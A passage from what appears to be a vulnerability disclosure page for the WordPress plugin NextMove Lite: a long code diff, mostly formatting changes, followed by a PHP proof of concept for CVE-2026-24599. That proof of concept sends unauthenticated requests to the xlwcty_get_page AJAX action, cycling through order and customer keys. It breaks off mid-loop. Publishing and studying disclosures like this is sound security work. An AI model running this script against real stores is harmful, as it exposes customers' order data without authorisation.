 defined( 'ABSPATH' ) || exit;

 if ( '' !== $this->data->html_content || '' !== $this->data->heading ) {
-    XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
-    ?>
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
+	?>
     <div class="xlwcty_Box xlwcty_textBox <?php echo 'xlwcty_textBox_1'; ?>">
-        <?php
-        $heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
-        echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        $html_content_parsed = $this->data->html_content ? apply_filters( 'xlwcty_the_content', $this->data->html_content ) : '';
-        // Unfiltered HTML output is intentional for this component.
-        // This enables embedding third-party forms (Gravity Forms, WPForms), scripts, and iframes.
-        // Security: Content is only editable by users with manage_woocommerce capability via the admin page builder.
-        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
-        echo $html_content_parsed ? '<div class="xlwcty_content">' . $html_content_parsed . '</div>' : '';
-        ?>
+		<?php
+		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
+		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
+		$html_content_parsed = $this->data->html_content ? apply_filters( 'xlwcty_the_content', $this->data->html_content ) : '';
+		// Unfiltered HTML output is intentional for this component.
+		// This enables embedding third-party forms (Gravity Forms, WPForms), scripts, and iframes.
+		// Security: Content is only editable by users with manage_woocommerce capability via the admin page builder.
+		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+		echo $html_content_parsed ? '<div class="xlwcty_content">' . $html_content_parsed . '</div>' : '';
+		?>
     </div>
-    <?php
+	<?php
 } else {
-    XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
 }
--- a/woo-thank-you-page-nextmove-lite/components/image-content/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/help.php
@@ -1,36 +1,36 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/image-content/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Layout:</strong> Plugin has 4 layouts `Single Image`, `Two Images`, `Left Image Text` & `Text Right Image`.<br/>Single Image - This has a single image upload and link
-					option.<br/>Two Images - Two Images with link in 50/50 ratio.<br/>Left Image Text - Choose Image Content ratio with other options to add image, link and text.<br/>Text Right Image
-					- Choose Image Content ratio with other options to add image, link and text.
-				</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Button:</strong> If you wish to display button, choose 'Yes' option. Further has link option with other CSS options.</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/image-content/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Layout:</strong> Plugin has 4 layouts `Single Image`, `Two Images`, `Left Image Text` & `Text Right Image`.<br/>Single Image - This has a single image upload and link
+                    option.<br/>Two Images - Two Images with link in 50/50 ratio.<br/>Left Image Text - Choose Image Content ratio with other options to add image, link and text.<br/>Text Right Image
+                    - Choose Image Content ratio with other options to add image, link and text.
+                </td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Button:</strong> If you wish to display button, choose 'Yes' option. Further has link option with other CSS options.</td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/image-content/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/instance.php
@@ -6,9 +6,9 @@

 	private static $instance = null;
 	public $instance_campaign_data;
-	public $is_disable      = true;
-	public $viewpath        = '';
-	public $is_multiple     = true;
+	public $is_disable = true;
+	public $viewpath = '';
+	public $is_multiple = true;
 	public $component_limit = 1;

 	public function __construct( $order = false ) {
@@ -93,7 +93,7 @@
 			}
 			if ( $this->data->btn_bg_color != '' ) {
 				$style['.xlwcty_wrap .xlwcty_Box.xlwcty_imgBox.xlwcty_imgBox_1 .xlwcty_btn']['background'] = $this->data->btn_bg_color;
-				$rgba = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );
+				$rgba                                                                                      = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );
 				if ( $rgba != '' ) {
 					$style['.xlwcty_wrap .xlwcty_Box.xlwcty_imgBox.xlwcty_imgBox_1 .xlwcty_btn:hover']['background'] = "rgba({$rgba},0.70)";
 				}
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/2c.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/2c.php
@@ -17,7 +17,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -26,42 +26,42 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_imgBox_2cw xlwcty_clearfix">
+    <div class="xlwcty_imgBox_w xlwcty_imgBox_2cw xlwcty_clearfix">
 		<?php
 		if ( $source_left != '' ) {
 			$left_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			?>
-			<div class="xlwcty_content xlwcty_center xlwcty_50" data-style="left">
+            <div class="xlwcty_content xlwcty_center xlwcty_50" data-style="left">
 				<?php
 				printf( "<a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a>", esc_url( $left_img_link_parsed ), esc_url( $source_left ) );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		if ( $source_right != '' ) {
 			$right_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $right_image_link );
 			?>
-			<div class="xlwcty_content xlwcty_center xlwcty_50" data-style="right">
+            <div class="xlwcty_content xlwcty_center xlwcty_50" data-style="right">
 				<?php
 				printf( "<a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a>", esc_url( $right_img_link_parsed ), esc_url( $source_right ) );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		?>
-	</div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/full.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/full.php
@@ -6,12 +6,12 @@
 if ( $source != '' ) {
 	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
 	?>
-	<div class="xlwcty_Box xlwcty_imgBox <?php echo 'xlwcty_imgBox_1'; ?>">
+    <div class="xlwcty_Box xlwcty_imgBox <?php echo 'xlwcty_imgBox_1'; ?>">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
 		?>
-		<div class="xlwcty_content">
+        <div class="xlwcty_content">
 			<?php
 			$desc_class = '';
 			if ( ! empty( $this->data->desc_alignment ) ) {
@@ -20,32 +20,32 @@
 			$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 			echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 			?>
-			<div class="xlwcty_imgBox_w xlwcty_clearfix">
+            <div class="xlwcty_imgBox_w xlwcty_clearfix">
 				<?php
 				$img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $full_image_link );
 				printf( "<p class='xlwcty_center'><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $img_link_parsed ), esc_url( $source ) );
 				?>

-			</div>
+            </div>
 			<?php
 			if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 				$btn_link = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 				?>
-				<div class="xlwcty_clear_20"></div>
-				<div class="xlwcty_clearfix xlwcty_center">
+                <div class="xlwcty_clear_20"></div>
+                <div class="xlwcty_clearfix xlwcty_center">
 					<?php
 					$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 					$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 					?>
-					<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+                    <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 						<?php echo wp_kses_post( $btn_text_parsed ); ?>
-					</a>
-				</div>
+                    </a>
+                </div>
 				<?php
 			}
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 } else {
 	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/left-image.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/left-image.php
@@ -27,7 +27,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -36,32 +36,32 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_clearfix">
-		<div class="xlwcty_content xlwcty_center <?php echo esc_attr( $left_class ); ?>" data-style="left">
+    <div class="xlwcty_imgBox_w xlwcty_clearfix">
+        <div class="xlwcty_content xlwcty_center <?php echo esc_attr( $left_class ); ?>" data-style="left">
 			<?php
 			$left_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			printf( "<p><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $left_img_link_parsed ), esc_url( $source_left ) );
 			?>
-		</div>
-		<div class="xlwcty_content <?php echo esc_attr( $right_class ); ?>" data-style="right">
+        </div>
+        <div class="xlwcty_content <?php echo esc_attr( $right_class ); ?>" data-style="right">
 			<?php
 			$content_parsed = apply_filters( 'xlwcty_the_content', $content );
 			echo wp_kses_post( $content_parsed );
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/right-image.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/right-image.php
@@ -26,7 +26,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -35,38 +35,38 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_clearfix">
+    <div class="xlwcty_imgBox_w xlwcty_clearfix">
 		<?php
 		if ( $content != '' ) {
 			?>
-			<div class="xlwcty_content <?php echo esc_attr( $left_class ); ?>" data-style="left">
+            <div class="xlwcty_content <?php echo esc_attr( $left_class ); ?>" data-style="left">
 				<?php
 				$content_parsed = apply_filters( 'xlwcty_the_content', $content );
 				echo wp_kses_post( $content_parsed );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		?>
-		<div class="xlwcty_content xlwcty_center <?php echo esc_attr( $right_class ); ?>" data-style="right">
+        <div class="xlwcty_content xlwcty_center <?php echo esc_attr( $right_class ); ?>" data-style="right">
 			<?php
 			$img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			printf( "<p><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $img_link_parsed ), esc_url( $source_left ) );
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
--- a/woo-thank-you-page-nextmove-lite/components/join-us/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/join-us/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Social_Sharing extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $is_disable       = true;
+	public $viewpath = '';
+	public $is_disable = true;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/map/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/help.php
@@ -1,33 +1,33 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/map/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Map:</strong> You can select map style (choose from 8 styles), zoom level, marker address and marker icon.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Marker Text:</strong> Enter text you want to display inside your marker window.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/map/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Map:</strong> You can select map style (choose from 8 styles), zoom level, marker address and marker icon.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Marker Text:</strong> Enter text you want to display inside your marker window.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/map/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/instance.php
@@ -5,9 +5,9 @@
 class XLWCTY_Shipping_Billing_Based_Map extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $map_add          = '';
-	public $is_disable       = false;
+	public $viewpath = '';
+	public $map_add = '';
+	public $is_disable = false;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/map/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/views/view.php
@@ -19,21 +19,21 @@

 ?>
 <div class="xlwcty_Box xlwcty_Map">
-	<div class="xlwcty_mapDiv xlwcty-map-component" data-address='<?php echo esc_attr( $this->data->map_add ); ?>' data-zoom-level='<?php echo esc_attr( $default_zoom ); ?>'
-		data-nm-icon="<?php echo esc_attr( $this->data->icon ); ?>" data-style="<?php echo esc_attr( $this->data->style ? $this->data->style : 'standard' ); ?>"
-		data-marker-text="
+    <div class="xlwcty_mapDiv xlwcty-map-component" data-address='<?php echo esc_attr( $this->data->map_add ); ?>' data-zoom-level='<?php echo esc_attr( $default_zoom ); ?>'
+         data-nm-icon="<?php echo esc_attr( $this->data->icon ); ?>" data-style="<?php echo esc_attr( $this->data->style ? $this->data->style : 'standard' ); ?>"
+         data-marker-text="
 		<?php
-			$marker_text_parsed = apply_filters( 'xlwcty_the_content', $this->data->marker_text );
-			echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) );
-		?>
+	     $marker_text_parsed = apply_filters( 'xlwcty_the_content', $this->data->marker_text );
+	     echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) );
+	     ?>
 		">
 		<?php
 		if ( empty( $is_google_key_exist ) ) {
-            echo '<div class="xlwcty_map_error_txt">' . esc_html__( 'Google Map API Key is missing.', 'woo-thank-you-page-nextmove-lite' ) . '</div>';
+			echo '<div class="xlwcty_map_error_txt">' . esc_html__( 'Google Map API Key is missing.', 'woo-thank-you-page-nextmove-lite' ) . '</div>';
 		}
 		?>
-	</div>
-	<div class="xlwcty_content">
+    </div>
+    <div class="xlwcty_content">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
@@ -44,5 +44,5 @@
 		$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 		echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 		?>
-	</div>
+    </div>
 </div>
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/help.php
@@ -1,26 +1,26 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/order-acknowledge/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Icon:</strong> Select 'Built-in' option to choose from available icons with color. 'Custom' option to upload your own icon. And 'none' option for no icon.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Heading:</strong> Enter any Heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Sub Heading</strong> Enter any Sub-Heading. Customize font size and text alignment too.</td>
-			</tr>
-
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/order-acknowledge/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Icon:</strong> Select 'Built-in' option to choose from available icons with color. 'Custom' option to upload your own icon. And 'none' option for no icon.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Heading:</strong> Enter any Heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Sub Heading</strong> Enter any Sub-Heading. Customize font size and text alignment too.</td>
+            </tr>
+
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/instance.php
@@ -5,19 +5,19 @@
 class XLWCTY_Content_Order_Acknowledge extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = false;
-	public $viewpath         = '';
-	public $source           = '';
-	public $height           = '';
-	public $width            = '';
-	public $heading1         = '';
-	public $heading1_color   = '';
-	public $heading1_font    = '';
-	public $heading2         = '';
-	public $heading2_color   = '';
-	public $heading2_font    = '';
-	public $icon_type        = '';
-	public $icon_html        = '';
+	public $is_disable = false;
+	public $viewpath = '';
+	public $source = '';
+	public $height = '';
+	public $width = '';
+	public $heading1 = '';
+	public $heading1_color = '';
+	public $heading1_font = '';
+	public $heading2 = '';
+	public $heading2_color = '';
+	public $heading2_font = '';
+	public $icon_type = '';
+	public $icon_html = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/views/view.php
@@ -3,7 +3,7 @@

 XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
 ?>
-	<div class="xlwcty_order_info">
+    <div class="xlwcty_order_info">
 		<?php
 		echo $this->icon_html ? wp_kses_post( $this->icon_html ) : '';
 		$heading1_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
@@ -11,5 +11,5 @@
 		$heading2_parsed = $this->data->heading2 ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading2 ) : '';
 		echo $heading2_parsed

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24599 - NextMove Lite <= 2.23.0 - Unauthenticated Insecure Direct Object Reference

<?php

$target_url = "http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php";

// The vulnerable AJAX action
$action = "xlwcty_get_page";

// Test with different key values to enumerate objects
$test_keys = [
    "order_123",
    "page_456",
    "customer_789",
    "settings_global",
    "template_default"
];

echo "Testing CVE-2026-24599 on: " . $target_url . "nn";

foreach ($test_keys as $key) {
    $post_data = [
        'action' => $action,
        'key' => $key,
        '_ajax_nonce' => '' // Nonce is not required due to the vulnerability
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Set headers to mimic legitimate browser request
    $headers = [
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With: XMLHttpRequest',
        'Connection: close'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    $response = curl_exec($ch);
